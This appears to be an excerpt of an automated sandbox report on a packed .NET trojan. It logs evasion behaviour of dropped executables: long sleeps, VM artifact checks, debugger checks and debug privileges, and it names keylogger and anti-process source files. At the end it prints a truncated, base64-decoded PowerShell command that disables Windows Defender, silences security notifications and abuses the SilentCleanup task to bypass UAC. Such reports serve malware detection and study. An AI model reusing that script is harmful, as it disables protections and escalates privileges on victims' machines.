Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Client.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598556	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598433	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598323	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596948	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596270	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99866	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99628	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99389	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99280	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99171	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99793	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99647	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99210	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 593075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592785	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592507	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592367	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591789	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99531
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99201
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98978
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98830
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98672
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99887
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99521
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99406
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97670
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97551
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 97316
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99859
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99746
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99640
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99421
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99203
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99079
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98750
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99936
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99742
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99561
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99319
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99180
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99060
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98943
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98804
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 591993
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99876
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 598704
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99871
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99755
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99633
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99516
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99401
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99285
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99168
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99053
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99684
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99564
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99435
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99314
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99193
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99062
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98958
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98822
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98706
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98573
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98459
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99960
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99852
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99708
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99591
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99469
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99351
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99236
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99105
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 98872
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99901
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99753
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Thread delayed: delay time: 99615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.30.dr	Binary or memory string: VMware
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.30.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.30.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.30.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.30.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2728713253.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2747981173.000000001B573000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Info.txt.21.dr	Binary or memory string: VirtualMachine: False
Source: Amcache.hve.30.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: Amcache.hve.30.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 0000001F.00000002.3250841388.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: Amcache.hve.30.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3250933723.0000000001203000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000019.00000002.2255759689.0000015CBE79E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: A2e$ConvertByrefToPtrVen_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRo
Source: Amcache.hve.30.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.30.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.30.dr	Binary or memory string: vmci.syshbin`
Source: Loaader.exe.3.dr	Binary or memory string: vmware
Source: Amcache.hve.30.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.30.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: VMware20,1
Source: Infected.exe, 00000003.00000002.2047247573.000000001AD7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.30.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.30.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.30.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.30.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.30.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\Client.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Client.exe.0.dr, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: Client.exe.0.dr, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: Client.exe.0.dr, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 